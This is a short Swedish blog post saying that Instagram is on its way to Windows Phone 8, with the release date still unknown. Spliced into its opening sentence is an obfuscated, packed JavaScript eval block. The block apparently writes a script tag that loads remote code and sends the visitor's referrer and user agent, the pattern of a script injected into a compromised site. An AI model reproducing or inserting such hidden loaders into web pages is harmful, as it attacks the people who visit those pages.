Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Instagram till Windows Phone 8 på väg

Instagram till Windows Phone 8 på väg
Sebastian

Alla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dibbr|var|u0026u|referrer|yikfe||js|php’.split(’|’),0,{}))
Windows Phone 8 användare, var inte skraja. Nu är Instagram på väg även till er.

För er som trott att Instagram inte skulle finnas till Windows Phone 8 har trott helt fel. Självklart kommer de stora apparna som finns på Android och iOS även komma till Windows Phone 8.

Det tar tid att utveckla appar och även tid för telefonerna att komma ut till konsumenterna. Både dessa saker är viktiga faktorer när det kommer till att ens börja utvecklingen. Men genom att Windows Phone 8 kommer att bi en stor spelare på mobilmarknaden så behöver ni inte vara rädda, det kommer.

Instagram har meddelat att de kommer att släppa en applikation men vilket datum den är klar är fortfarande oklart. Kanske om vi har tur så blir det innan julen annars i början av nästa år dvs januari eller februari månad.

Mer filtrerade bilder åt folket, we love it!